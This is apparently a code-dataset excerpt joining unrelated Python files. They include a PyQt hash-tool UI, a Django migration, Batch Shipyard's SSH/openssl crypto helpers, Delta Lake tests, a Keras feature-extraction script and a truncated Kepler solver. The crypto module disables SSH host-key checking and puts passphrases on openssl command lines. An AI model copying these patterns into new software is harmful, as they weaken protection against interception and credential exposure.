def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.Algorithms.setCurrentText(_translate("MainWindow", "Select encryption algorithm"))
self.Algorithms.setItemText(0, _translate("MainWindow", "Select encryption algorithm"))
self.Algorithms.setItemText(1, _translate("MainWindow", "sha256"))
self.Algorithms.setItemText(2, _translate("MainWindow", "md5"))
self.Algorithms.setItemText(3, _translate("MainWindow", "sha224"))
self.Algorithms.setItemText(4, _translate("MainWindow", "sha1"))
self.Algorithms.setItemText(5, _translate("MainWindow", "sha512"))
self.Generate.setText(_translate("MainWindow", "GENERATE"))
self.Copy.setText(_translate("MainWindow", "COPY TO CLIPBOARD"))
self.hexify.setText(_translate("MainWindow", "Hexify?"))
self.HideShow.setIcon(QtGui.QIcon("Assets//EYECLOSE.png"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 2.234375 | 2 |
yxtx/myApp/migrations/0017_chat.py | wjh112233/yxtx | 0 | 1140 | # Generated by Django 3.0.2 on 2020-03-17 08:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myApp', '0016_usergroup_buyer'),
]
operations = [
migrations.CreateModel(
name='Chat',
fields=[
('id', models.CharField(max_length=31, primary_key=True, serialize=False)),
('chatinfo', models.CharField(max_length=20000)),
('shopid', models.CharField(max_length=30)),
('user1', models.CharField(max_length=50)),
('user2', models.CharField(max_length=50)),
('name1', models.CharField(max_length=50)),
('name2', models.CharField(max_length=50)),
],
),
]
| 1.976563 | 2 |
core/controllers/services.py | willingc/oh-missions-oppia-beta | 0 | 1141 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for miscellaneous services."""
__author__ = '<NAME>'
import base64
import json
from core.controllers import base
class FileReadHandler(base.BaseHandler):
"""Returns a base64-encoded ascii string with uploaded file's content."""
def post(self):
raw_file_content = self.request.get('file')
encoded_content = base64.b64encode(raw_file_content)
self.response.headers['Content-Type'] = 'application/json'
response = {
'base64_file_content': encoded_content,
}
self.response.out.write(json.dumps(response))
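# Usage sketch (illustrative, not part of the original controller): a client
# is assumed to POST multipart form data containing a 'file' field to the URL
# this handler is mounted at; the JSON response mirrors the dict built above:
#     {"base64_file_content": "<base64-encoded ascii string>"}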
| 2.390625 | 2 |
convoy/crypto.py | hebinhuang/batch-shipyard | 0 | 1142 | <filename>convoy/crypto.py
# Copyright (c) Microsoft Corporation
#
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# compat imports
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from builtins import ( # noqa
bytes, dict, int, list, object, range, str, ascii, chr, hex, input,
next, oct, open, pow, round, super, filter, map, zip)
# stdlib imports
import base64
import collections
import getpass
import logging
import os
try:
import pathlib2 as pathlib
except ImportError:
import pathlib
import tempfile
import stat
import subprocess
# local imports
from . import settings
from . import util
# create logger
logger = logging.getLogger(__name__)
util.setup_logger(logger)
# global defines
_SSH_KEY_PREFIX = 'id_rsa_shipyard'
_REMOTEFS_SSH_KEY_PREFIX = '{}_remotefs'.format(_SSH_KEY_PREFIX)
# named tuples
PfxSettings = collections.namedtuple(
'PfxSettings', ['filename', 'passphrase', 'sha1'])
def get_ssh_key_prefix():
# type: (None) -> str
"""Get SSH key prefix
:rtype: str
:return: ssh key prefix
"""
return _SSH_KEY_PREFIX
def get_remotefs_ssh_key_prefix():
# type: (None) -> str
"""Get remote fs SSH key prefix
:rtype: str
:return: ssh key prefix for remote fs
"""
return _REMOTEFS_SSH_KEY_PREFIX
def generate_rdp_password():
# type: (None) -> str
"""Generate an RDP password
:rtype: str
:return: rdp password
"""
return base64.b64encode(os.urandom(8))
def generate_ssh_keypair(export_path, prefix=None):
# type: (str, str) -> tuple
"""Generate an ssh keypair for use with user logins
:param str export_path: keypair export path
:param str prefix: key prefix
:rtype: tuple
:return: (private key filename, public key filename)
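    Example (sketch for illustration only; assumes ssh-keygen is on PATH):
        priv, pub = generate_ssh_keypair('.')
        # priv/pub are pathlib.Path objects for id_rsa_shipyard{,.pub}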
"""
if util.is_none_or_empty(prefix):
prefix = _SSH_KEY_PREFIX
privkey = pathlib.Path(export_path, prefix)
pubkey = pathlib.Path(export_path, prefix + '.pub')
if privkey.exists():
old = pathlib.Path(export_path, prefix + '.old')
if old.exists():
old.unlink()
privkey.rename(old)
if pubkey.exists():
old = pathlib.Path(export_path, prefix + '.pub.old')
if old.exists():
old.unlink()
pubkey.rename(old)
logger.info('generating ssh key pair to path: {}'.format(export_path))
subprocess.check_call(
        ['ssh-keygen', '-f', str(privkey), '-t', 'rsa', '-N', ''])
return (privkey, pubkey)
def check_ssh_private_key_filemode(ssh_private_key):
# type: (pathlib.Path) -> bool
"""Check SSH private key filemode
:param pathlib.Path ssh_private_key: SSH private key
:rtype: bool
:return: private key filemode is ok
"""
def _mode_check(fstat, flag):
return bool(fstat & flag)
if util.on_windows():
return True
fstat = ssh_private_key.stat().st_mode
modes = frozenset((stat.S_IRWXG, stat.S_IRWXO))
return not any([_mode_check(fstat, x) for x in modes])
def connect_or_exec_ssh_command(
remote_ip, remote_port, ssh_private_key, username, sync=True,
shell=False, tty=False, ssh_args=None, command=None):
# type: (str, int, pathlib.Path, str, bool, bool, tuple, tuple) -> bool
"""Connect to node via SSH or execute SSH command
:param str remote_ip: remote ip address
:param int remote_port: remote port
:param pathlib.Path ssh_private_key: SSH private key
:param str username: username
:param bool sync: synchronous execution
:param bool shell: execute with shell
:param bool tty: allocate pseudo-tty
:param tuple ssh_args: ssh args
:param tuple command: command
:rtype: int or subprocess.Process
:return: return code or subprocess handle
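    Example (sketch for illustration only; the address, port, key path and
    username below are placeholders):
        rc = connect_or_exec_ssh_command(
            '10.0.0.4', 22, pathlib.Path('id_rsa_shipyard'), 'shipyard',
            command=('uptime',))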
"""
if not ssh_private_key.exists():
raise RuntimeError('SSH private key file not found at: {}'.format(
ssh_private_key))
# ensure file mode is set properly for the private key
if not check_ssh_private_key_filemode(ssh_private_key):
logger.warning(
'SSH private key filemode is too permissive: {}'.format(
ssh_private_key))
# execute SSH command
ssh_cmd = [
'ssh', '-o', 'StrictHostKeyChecking=no',
'-o', 'UserKnownHostsFile={}'.format(os.devnull),
'-i', str(ssh_private_key), '-p', str(remote_port),
]
if tty:
ssh_cmd.append('-t')
if util.is_not_empty(ssh_args):
ssh_cmd.extend(ssh_args)
ssh_cmd.append('{}@{}'.format(username, remote_ip))
if util.is_not_empty(command):
ssh_cmd.extend(command)
logger.info('{} node {}:{} with key {}'.format(
'connecting to' if util.is_none_or_empty(command)
else 'executing command on', remote_ip, remote_port, ssh_private_key))
if sync:
return util.subprocess_with_output(ssh_cmd, shell=shell)
else:
return util.subprocess_nowait_pipe_stdout(
ssh_cmd, shell=shell, pipe_stderr=True)
def derive_private_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a private key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
        passphrase = getpass.getpass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def derive_public_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a public key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
        passphrase = getpass.getpass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', pemfile, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def _parse_sha1_thumbprint_openssl(output):
# type: (str) -> str
"""Get SHA1 thumbprint from buffer
    :param str output: openssl output buffer to parse
:rtype: str
:return: sha1 thumbprint of buffer
"""
# return just thumbprint (without colons) from the above openssl command
# in lowercase. Expected openssl output is in the form:
# SHA1 Fingerprint=<thumbprint>
return ''.join(util.decode_string(
output).strip().split('=')[1].split(':')).lower()
def get_sha1_thumbprint_pfx(pfxfile, passphrase):
# type: (str, str) -> str
"""Get SHA1 thumbprint of PFX
    :param str pfxfile: name of the pfx file to fingerprint
:param str passphrase: passphrase for pfx
:rtype: str
:return: sha1 thumbprint of pfx
"""
if pfxfile is None:
raise ValueError('pfxfile is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# compute sha1 thumbprint of pfx
pfxdump = subprocess.check_output(
['openssl', 'pkcs12', '-in', pfxfile, '-nodes', '-passin',
'pass:' + passphrase]
)
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate(input=pfxdump)[0])
def get_sha1_thumbprint_pem(pemfile):
# type: (str) -> str
"""Get SHA1 thumbprint of PEM
    :param str pemfile: name of the pem file to fingerprint
:rtype: str
:return: sha1 thumbprint of pem
"""
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint', '-in', pemfile],
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate()[0])
def generate_pem_pfx_certificates(config):
# type: (dict) -> str
"""Generate a pem and a derived pfx file
:param dict config: configuration dict
:rtype: str
:return: sha1 thumbprint of pfx
"""
# gather input
pemfile = settings.batch_shipyard_encryption_public_key_pem(config)
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
if pemfile is None:
pemfile = util.get_input('Enter public key PEM filename to create: ')
if pfxfile is None:
pfxfile = util.get_input('Enter PFX filename to create: ')
if passphrase is None:
while util.is_none_or_empty(passphrase):
passphrase = getpass.getpass('Enter password for PFX: ')
if len(passphrase) == 0:
print('passphrase cannot be empty')
privatekey = pemfile + '.key'
# generate pem file with private key and no password
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
try:
subprocess.check_call(
['openssl', 'req', '-new', '-nodes', '-x509', '-newkey',
'rsa:2048', '-keyout', privatekey, '-out', f.name, '-days', '730',
'-subj', '/C=US/ST=None/L=None/O=None/CN=BatchShipyard']
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', privatekey, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
logger.debug('created public key PEM file: {}'.format(pemfile))
# convert pem to pfx for Azure Batch service
subprocess.check_call(
['openssl', 'pkcs12', '-export', '-out', pfxfile, '-inkey',
privatekey, '-in', f.name, '-certfile', f.name,
'-passin', 'pass:', '-passout', 'pass:' + passphrase]
)
logger.debug('created PFX file: {}'.format(pfxfile))
finally:
# remove rsa private key file
fp = pathlib.Path(privatekey)
if fp.exists():
fp.unlink()
# remove temp cert pem
fp = pathlib.Path(f.name)
if fp.exists():
fp.unlink()
# get sha1 thumbprint of pfx
return get_sha1_thumbprint_pfx(pfxfile, passphrase)
def get_encryption_pfx_settings(config):
# type: (dict) -> tuple
"""Get PFX encryption settings from configuration
:param dict config: configuration settings
:rtype: tuple
:return: pfxfile, passphrase, sha1 tp
"""
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
sha1_cert_tp = settings.batch_shipyard_encryption_pfx_sha1_thumbprint(
config)
# manually get thumbprint of pfx if not exists in config
if util.is_none_or_empty(sha1_cert_tp):
if pfx_passphrase is None:
            pfx_passphrase = getpass.getpass('Enter password for PFX: ')
sha1_cert_tp = get_sha1_thumbprint_pfx(pfxfile, pfx_passphrase)
settings.set_batch_shipyard_encryption_pfx_sha1_thumbprint(
config, sha1_cert_tp)
return PfxSettings(
filename=pfxfile, passphrase=pfx_passphrase, sha1=sha1_cert_tp)
def _rsa_encrypt_string(data, config):
# type: (str, dict) -> str
"""RSA encrypt a string
:param str data: clear text data to encrypt
:param dict config: configuration dict
:rtype: str
:return: base64-encoded cipher text
"""
if util.is_none_or_empty(data):
raise ValueError('invalid data to encrypt')
inkey = settings.batch_shipyard_encryption_public_key_pem(config)
derived = False
if inkey is None:
# derive pem from pfx
derived = True
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(
config)
inkey = derive_public_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
try:
if inkey is None:
raise RuntimeError('public encryption key is invalid')
proc = subprocess.Popen(
['openssl', 'rsautl', '-encrypt', '-pubin', '-inkey', inkey],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
ciphertext = util.base64_encode_string(
proc.communicate(input=util.encode_string(data))[0])
if proc.returncode != 0:
raise RuntimeError(
'openssl encryption failed with returncode: {}'.format(
proc.returncode))
return ciphertext
finally:
if derived:
fp = pathlib.Path(inkey)
if fp.exists():
fp.unlink()
def _rsa_decrypt_string_with_pfx(ciphertext, config):
# type: (str, dict) -> str
"""RSA decrypt a string
:param str ciphertext: cipher text in base64
:param dict config: configuration dict
:rtype: str
:return: decrypted cipher text
"""
if util.is_none_or_empty(ciphertext):
raise ValueError('invalid ciphertext to decrypt')
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
pemfile = derive_private_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
if pemfile is None:
raise RuntimeError('cannot decrypt without valid private key')
cleartext = None
try:
data = util.base64_decode_string(ciphertext)
proc = subprocess.Popen(
['openssl', 'rsautl', '-decrypt', '-inkey', pemfile],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cleartext = proc.communicate(input=data)[0]
finally:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
return cleartext
def encrypt_string(enabled, string, config):
# type: (bool, str, dict) -> str
"""Encrypt a string
:param bool enabled: if encryption is enabled
:param str string: string to encrypt
:param dict config: configuration dict
:rtype: str
:return: encrypted string if enabled
"""
if enabled:
return _rsa_encrypt_string(string, config)
else:
return string
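# Usage sketch (illustrative, not part of the original module): assuming
# `config` is a loaded configuration dict whose PFX settings reference a valid
# certificate and openssl is on PATH, a credential can be round-tripped with:
#     ciphertext = encrypt_string(True, 'storage-account-key', config)
#     cleartext = _rsa_decrypt_string_with_pfx(ciphertext, config)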
| 1.726563 | 2 |
libs/configs/COCO/cfgs_res50_1x_coco_v3.py | lj-ecjtu/Cascade_FPN_Tensorflow-master | 43 | 1143 | # -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import os
import tensorflow as tf
'''
gluoncv backbone + multi_gpu
'''
# ------------------------------------------------
VERSION = 'Cascade_FPN_Res50_COCO_1x_20190421_v3'
NET_NAME = 'resnet50_v1d'
ADD_BOX_IN_TENSORBOARD = True
# ---------------------------------------- System_config
ROOT_PATH = os.path.abspath('../')
print(20*"++--")
print(ROOT_PATH)
GPU_GROUP = "0,1,2,3,4,5,6,7"
NUM_GPU = len(GPU_GROUP.strip().split(','))
SHOW_TRAIN_INFO_INTE = 20
SMRY_ITER = 200
SAVE_WEIGHTS_INTE = 80000
SUMMARY_PATH = ROOT_PATH + '/output/summary'
TEST_SAVE_PATH = ROOT_PATH + '/tools/test_result'
INFERENCE_IMAGE_PATH = ROOT_PATH + '/tools/inference_image'
INFERENCE_SAVE_PATH = ROOT_PATH + '/tools/inference_results'
if NET_NAME.startswith("resnet"):
weights_name = NET_NAME
elif NET_NAME.startswith("MobilenetV2"):
weights_name = "mobilenet/mobilenet_v2_1.0_224"
else:
raise NotImplementedError
PRETRAINED_CKPT = ROOT_PATH + '/data/pretrained_weights/' + weights_name + '.ckpt'
TRAINED_CKPT = os.path.join(ROOT_PATH, 'output/trained_weights')
EVALUATE_DIR = ROOT_PATH + '/output/evaluate_result_pickle/'
# ------------------------------------------ Train config
RESTORE_FROM_RPN = False
IS_FILTER_OUTSIDE_BOXES = False
FIXED_BLOCKS = 0 # allow 0~3
FREEZE_BLOCKS = [True, False, False, False, False] # for gluoncv backbone
USE_07_METRIC = True
CUDA9 = True
EVAL_THRESHOLD = 0.5
RPN_LOCATION_LOSS_WEIGHT = 1.
RPN_CLASSIFICATION_LOSS_WEIGHT = 1.0
FAST_RCNN_LOCATION_LOSS_WEIGHT = 1.0
FAST_RCNN_CLASSIFICATION_LOSS_WEIGHT = 1.0
RPN_SIGMA = 3.0
FASTRCNN_SIGMA = 1.0
MUTILPY_BIAS_GRADIENT = None # 2.0 # if None, will not multipy
GRADIENT_CLIPPING_BY_NORM = None # 10.0 if None, will not clip
EPSILON = 1e-5
MOMENTUM = 0.9
BATCH_SIZE = 1
WARM_SETP = int(0.25 * SAVE_WEIGHTS_INTE)
LR = 5e-4 * 2 * 1.25 * NUM_GPU * BATCH_SIZE
DECAY_STEP = [11*SAVE_WEIGHTS_INTE, 16*SAVE_WEIGHTS_INTE, 20*SAVE_WEIGHTS_INTE] # 50000, 70000
MAX_ITERATION = 20*SAVE_WEIGHTS_INTE
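# Worked example (illustrative note): with the defaults above, NUM_GPU == 8
# and BATCH_SIZE == 1, so LR = 5e-4 * 2 * 1.25 * 8 = 0.01, WARM_SETP = 20000,
# DECAY_STEP = [880000, 1280000, 1600000] and MAX_ITERATION = 1600000.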
# -------------------------------------------- Data_preprocess_config
DATASET_NAME = 'coco' # 'pascal', 'coco'
PIXEL_MEAN = [123.68, 116.779, 103.939] # R, G, B. In tf, channel is RGB. In openCV, channel is BGR
PIXEL_MEAN_ = [0.485, 0.456, 0.406]
PIXEL_STD = [0.229, 0.224, 0.225] # R, G, B. In tf, channel is RGB. In openCV, channel is BGR
IMG_SHORT_SIDE_LEN = 800
IMG_MAX_LENGTH = 1333
CLASS_NUM = 80
# --------------------------------------------- Network_config
INITIALIZER = tf.random_normal_initializer(mean=0.0, stddev=0.01)
BBOX_INITIALIZER = tf.random_normal_initializer(mean=0.0, stddev=0.001)
WEIGHT_DECAY = 0.00004 if NET_NAME.startswith('Mobilenet') else 0.0001
IS_ASSIGN = True
# ---------------------------------------------Anchor config
USE_CENTER_OFFSET = True
LEVLES = ['P2', 'P3', 'P4', 'P5', 'P6']
BASE_ANCHOR_SIZE_LIST = [32, 64, 128, 256, 512]
ANCHOR_STRIDE_LIST = [4, 8, 16, 32, 64]
ANCHOR_SCALES = [1.0]
ANCHOR_RATIOS = [0.5, 1., 2.0]
ROI_SCALE_FACTORS = [[10., 10., 5.0, 5.0], [20., 20., 10.0, 10.0], [40., 40., 20.0, 20.0]]
ANCHOR_SCALE_FACTORS = [10., 10., 5.0, 5.0]
# --------------------------------------------FPN config
SHARE_HEADS = True
KERNEL_SIZE = 3
RPN_IOU_POSITIVE_THRESHOLD = 0.7
RPN_IOU_NEGATIVE_THRESHOLD = 0.3
TRAIN_RPN_CLOOBER_POSITIVES = False
RPN_MINIBATCH_SIZE = 256
RPN_POSITIVE_RATE = 0.5
RPN_NMS_IOU_THRESHOLD = 0.7
RPN_TOP_K_NMS_TRAIN = 12000
RPN_MAXIMUM_PROPOSAL_TARIN = 2000
RPN_TOP_K_NMS_TEST = 6000
RPN_MAXIMUM_PROPOSAL_TEST = 1000
# -------------------------------------------Fast-RCNN config
ROI_SIZE = 14
ROI_POOL_KERNEL_SIZE = 2
USE_DROPOUT = False
KEEP_PROB = 1.0
SHOW_SCORE_THRSHOLD = 0.6 # only show in tensorboard
FAST_RCNN_NMS_IOU_THRESHOLD = 0.5 # 0.6
FAST_RCNN_NMS_MAX_BOXES_PER_CLASS = 100
FAST_RCNN_IOU_POSITIVE_THRESHOLD = 0.5
FAST_RCNN_IOU_NEGATIVE_THRESHOLD = 0.0  # proposals with IoU between this value and FAST_RCNN_IOU_POSITIVE_THRESHOLD are sampled as negatives
FAST_RCNN_MINIBATCH_SIZE = 512  # if set to -1, train with OHEM
FAST_RCNN_POSITIVE_RATE = 0.25
ADD_GTBOXES_TO_TRAIN = False
| 2.03125 | 2 |
python/delta/tests/test_exceptions.py | vibhaska/delta | 1 | 1144 | <gh_stars>1-10
#
# Copyright (2020) The Delta Lake Project Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import delta.exceptions as exceptions
from delta.testing.utils import DeltaTestCase
class DeltaExceptionTests(DeltaTestCase):
def _raise_concurrent_exception(self, exception_type):
e = exception_type("")
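        # Wrapping the JVM exception in a scala.util.Failure and calling get() re-throws it on
        # the JVM side; it then propagates back through Py4J, where the delta.exceptions
        # conversion hook (imported above) is expected to surface it as the matching Python
        # exception class asserted in the tests below.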
self.spark.sparkContext._jvm.scala.util.Failure(e).get()
def test_capture_concurrent_write_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentWriteException
self.assertRaises(exceptions.ConcurrentWriteException,
lambda: self._raise_concurrent_exception(e))
def test_capture_metadata_changed_exception(self):
e = self.spark._jvm.io.delta.exceptions.MetadataChangedException
self.assertRaises(exceptions.MetadataChangedException,
lambda: self._raise_concurrent_exception(e))
def test_capture_protocol_changed_exception(self):
e = self.spark._jvm.io.delta.exceptions.ProtocolChangedException
self.assertRaises(exceptions.ProtocolChangedException,
lambda: self._raise_concurrent_exception(e))
def test_capture_concurrent_append_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentAppendException
self.assertRaises(exceptions.ConcurrentAppendException,
lambda: self._raise_concurrent_exception(e))
def test_capture_concurrent_delete_read_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentDeleteReadException
self.assertRaises(exceptions.ConcurrentDeleteReadException,
lambda: self._raise_concurrent_exception(e))
def test_capture_concurrent_delete_delete_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentDeleteDeleteException
self.assertRaises(exceptions.ConcurrentDeleteDeleteException,
lambda: self._raise_concurrent_exception(e))
def test_capture_concurrent_transaction_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentTransactionException
self.assertRaises(exceptions.ConcurrentTransactionException,
lambda: self._raise_concurrent_exception(e))
if __name__ == "__main__":
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=4)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=4)
| 1.796875 | 2 |
day10/samematrix.py | nikhilsamninan/python-files | 0 | 1145 | def matrix_form():
r = int(input("Enter the no of rows"))
c = int(input("Enter the no of columns"))
matrix=[]
print("Enter the enteries")
for i in range(r):
a = []
for j in range(c):
a.append(int(input()))
matrix.append(a)
return(matrix)
def check_matrix(first_matrix, sec_matrix):
    if first_matrix == sec_matrix:
        print("same")
    else:
        print("not same")
print("Enter the 1st matrix")
first_matrix = matrix_form()
print(first_matrix)
print("Enter the 2nd matrix")
sec_matrix = matrix_form()
print(sec_matrix)
check_matrix(first_matrix,sec_matrix) | 3.921875 | 4 |
extractFeatures.py | PatrickJReed/Longboard | 1 | 1146 | #!/home/ubuntu/miniconda2/bin/python
from __future__ import division
import sys
import glob, os, gc
import uuid
import os.path
import csv
import numpy as np
from time import time
from subprocess import (call, Popen, PIPE)
from itertools import product
import shutil
import re
import pickle
from boto3.session import Session
import boto3
import h5py
import umap
import hdbscan
from keras.models import load_model
from keras.models import Model
from keras import backend as K
from keras.utils import multi_gpu_model
##Path to Data
basepath = "/home/ubuntu/"
subject = sys.argv[1]
with open("config.txt") as f:
config = [line.rstrip() for line in f]
print config[0]
print config[1]
session = Session(aws_access_key_id=config[0],aws_secret_access_key=config[1])
s3 = session.resource('s3')
s3 = boto3.client('s3')
s3.download_file('for-ndar',os.path.join("metadata/", subject + ".txt"),os.path.join(basepath,subject + ".txt"))
with open(subject + ".txt") as f:
Cells = [line.rstrip() for line in f]
session = Session(aws_access_key_id=config[0],aws_secret_access_key=config[1])
s3 = session.resource('s3')
s3.meta.client.download_file('bsmn-data',os.path.join('Inception_Transfer_Model.h5'),os.path.join(basepath,'Inception_Transfer_Model.h5'))
feat_extractor = load_model(os.path.join(basepath,'Inception_Transfer_Model.h5'))
parallel_model = multi_gpu_model(feat_extractor, gpus=2)
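# Note: the first batch in the loop below is scored with the 2-GPU wrapper (parallel_model);
# subsequent batches fall back to feat_extractor.predict on the single-GPU model.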
count = 0
for cell in Cells:
print(cell)
cell_size=0
cell_ids = []
s3.meta.client.download_file('bsmn-data',os.path.join(subject, cell+'_IDs.h5'),os.path.join(basepath,cell+'_IDs.h5'))
f = h5py.File(os.path.join(basepath,cell+'_IDs.h5'), 'r')
cell_ids = f['ID']
for cid in cell_ids:
cid = cid.decode('utf-8')
s3.meta.client.download_file('bsmn-data',os.path.join(subject, cell+'_'+cid+'.h5'),os.path.join(basepath,cell+'_'+cid+'.h5'))
xyz = h5py.File(os.path.join(basepath,cell+'_'+cid+'.h5'), 'r')
os.remove(os.path.join(basepath,cell+'_'+cid+'.h5'))
if count == 0:
X = xyz['X']
Y = xyz['Y']
Z = parallel_model.predict(X, batch_size = 128)
count+=1
length = len(Y)
U = [cid] * length
else:
X = xyz['X']
Y = np.append(Y,xyz['Y'], axis=0)
z = feat_extractor.predict(X, batch_size = 128)
Z = np.append(Z,z, axis=0)
length = len(xyz['Y'])
U = U + ([cid] * length)
print(Z.shape)
hf = h5py.File(subject+'_ef.h5', 'w')
hf.create_dataset('Y', data=Y)
hf.create_dataset('Z', data=Z)
hf.close()
session = Session(aws_access_key_id=config[0],aws_secret_access_key=config[1])
s3 = session.resource('s3')
s3.meta.client.upload_file(os.path.join(subject+'_ef.h5'),'bsmn-data',os.path.join(subject, subject+'_ef.h5'))
call(['sudo', 'shutdown', '-h', 'now']) | 1.84375 | 2 |
kepler.py | mdbernard/astrodynamics | 0 | 1147 | import numpy as np
from stumpff import C, S
from CelestialBody import BODIES
from numerical import newton, laguerre
from lagrange import calc_f, calc_fd, calc_g, calc_gd
def kepler_chi(chi, alpha, r0, vr0, mu, dt):
''' Kepler's Equation of the universal anomaly, modified
for use in numerical solvers. '''
z = alpha*chi**2
return (r0*vr0/np.sqrt(mu))*chi**2*C(z) + \
(1 - alpha*r0)*chi**3*S(z) + \
r0*chi - np.sqrt(mu)*dt
def dkepler_dchi(chi, alpha, r0, vr0, mu, dt):
''' Derivative of Kepler's Equation of the universal anomaly,
modified for use in numerical solvers. '''
z = alpha*chi**2
return (r0*vr0/np.sqrt(mu))*chi*(1 - alpha*chi**2*S(z)) + \
(1 - alpha*r0)*chi**2*C(z) + r0
def d2kepler_dchi2(chi, alpha, r0, vr0, mu, dt):
''' Second derivative of Kepler's Equation of the universal
anomaly, modified for use in numerical solvers. '''
z = alpha*chi**2
S_ = S(z)
return (r0*vr0/np.sqrt(mu))*(1 - 3*z*S_ + z*(C(z) - 3*S_)) + \
chi*(1 - z*S_)*(1 - alpha*r0)
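# The three functions above are f(chi), f'(chi) and f''(chi) for the universal-variable form of
# Kepler's equation,
#
#     sqrt(mu)*dt = (r0*vr0/sqrt(mu))*chi**2*C(z) + (1 - alpha*r0)*chi**3*S(z) + r0*chi,  z = alpha*chi**2,
#
# written as f(chi) = 0, so the root chi found below can be fed into the Lagrange coefficients.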
def solve_kepler_chi(r_0, v_0, dt, body=BODIES['Earth'], method='laguerre', tol=1e-7, max_iters=100):
